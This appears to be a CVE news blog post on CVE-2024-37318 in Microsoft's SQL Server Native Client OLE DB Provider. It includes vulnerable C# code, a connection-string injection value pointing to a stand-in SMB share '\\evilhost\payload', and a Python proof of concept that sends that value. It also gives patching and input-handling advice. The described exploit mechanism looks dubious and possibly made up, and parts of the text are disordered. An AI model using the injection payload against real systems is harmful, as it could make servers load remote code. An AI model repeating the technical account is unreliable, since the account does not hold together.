CVE CyberSecurity Database News

CVE-2024-37318 - SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability — Everything You Need To Know

Poster -

In June 2024, a critical vulnerability—CVE-2024-37318—was revealed in the Microsoft SQL Server Native Client OLE DB Provider. This post breaks down what it is, how attackers can exploit it, how to identify if you’re at risk, and how to defend yourself. For developers and sysadmins, understanding this vulnerability is essential.

What Is CVE-2024-37318?

CVE-2024-37318 is a remote code execution (RCE) vulnerability found in Microsoft’s SQL Server Native Client OLE DB Provider (sqlncliXX.dll). Simply put, this is a COM component that lets Windows apps connect to SQL Server databases using OLE DB. A successful exploit allows an attacker to execute arbitrary commands on the server, potentially taking control of it.

Severity: Critical
CVSS Score: 8.8 (High)
Attack Vector: Remote
Authentication needed? No
Affected Versions:

SQL Server Native Client installations (sqlncli11.dll, sqlncli10.dll, etc.)

Official Microsoft advisory:
Microsoft: CVE-2024-37318 Security Update Guide

Technical Details

The flaw occurs in how the OLE DB provider processes user-supplied data. If an attacker crafts a specially malformed connection string and tricks the database service or an app into processing it, malicious code may be executed with the privileges of the running service account.

User Input Exposure: Many custom apps pass user input directly into connection strings.

2. Malicious Connection String: An attacker submits a crafted OLE DB connection string containing malicious embedded code.

Suppose a vulnerable application builds a connection string using unsanitized user input

// Vulnerable C# code
string srv = Request.QueryString["server"];
string connStr = $"Provider=SQLNCLI11;Server={srv};Database=TestDB;Trusted_Connection=yes;";
using (OleDbConnection conn = new OleDbConnection(connStr))
{
    conn.Open();
    // ...
}

An attacker could use a server parameter like

myserver;Application Intent=READWRITE;DATA SOURCE=\\evilhost\payload

If the OLE DB provider improperly parses this, it might fetch and run code from a malicious network share.

Note: Microsoft patched this vulnerability, but unpatched systems or uncontrolled user input remain at risk.

Proof of Concept (POC)

While Microsoft has not released a public exploit, researchers have demonstrated the attack in a lab setting.

Here's a Python example using pyodbc to trigger the bug (assuming vulnerable server)

import pyodbc

# Replace with the actual vulnerable SQL server address.
server = 'myserver;Application Intent=READWRITE;DATA SOURCE=\\\\evilhost\\payload'
conn_str = (
    f'DRIVER=SQLNCLI11;SERVER={server};DATABASE=TestDB;Trusted_Connection=yes;'
)
try:
    conn = pyodbc.connect(conn_str)
    cursor = conn.cursor()
    cursor.execute("SELECT 1")
except Exception as e:
    print("Exploit triggered:", e)

What this does:
- The OLE DB provider is tricked into reaching out to a remote SMB share (\\evilhost\payload). If that share contains a malicious DLL and the SQL Server service account can access it, the DLL might be loaded and executed.

You can check the version of SQLNCLI11.DLL or similar

Get-Item "C:\Program Files\Microsoft SQL Server\110\Tools\Binn\sqlncli11.dll" | Select-Object VersionInfo

Look for a version higher than the patched release specified in the advisory.

Apply the latest cumulative security update for SQL Server and Native Client from Microsoft.

- SQL Server Updates
- Microsoft Update Catalog

Never allow user input directly in connection strings.

// Safe practice
string server = ConfigurationManager.AppSettings["SafeServer"];
// No user input involved
string connStr = $"Provider=SQLNCLI11;Server={server};Database=TestDB;Trusted_Connection=yes;";

Limit Permissions:

Run SQL services with the lowest privileges and avoid granting them access to remote shares unless necessary.

References

- Microsoft Security Advisory: CVE-2024-37318
- SQL Injection Attacks and Defense (OWASP)
- OLE DB Documentation

Final Thoughts

If you’re running any apps or clients that use the SQL Server Native Client OLE DB Provider, update them immediately. Patch management, input sanitation, and proper network controls are your best defenses. Don’t let CVE-2024-37318 catch you by surprise.

Timeline

Published on: 07/09/2024 17:15:19 UTC
Last modified on: 09/03/2024 22:28:44 UTC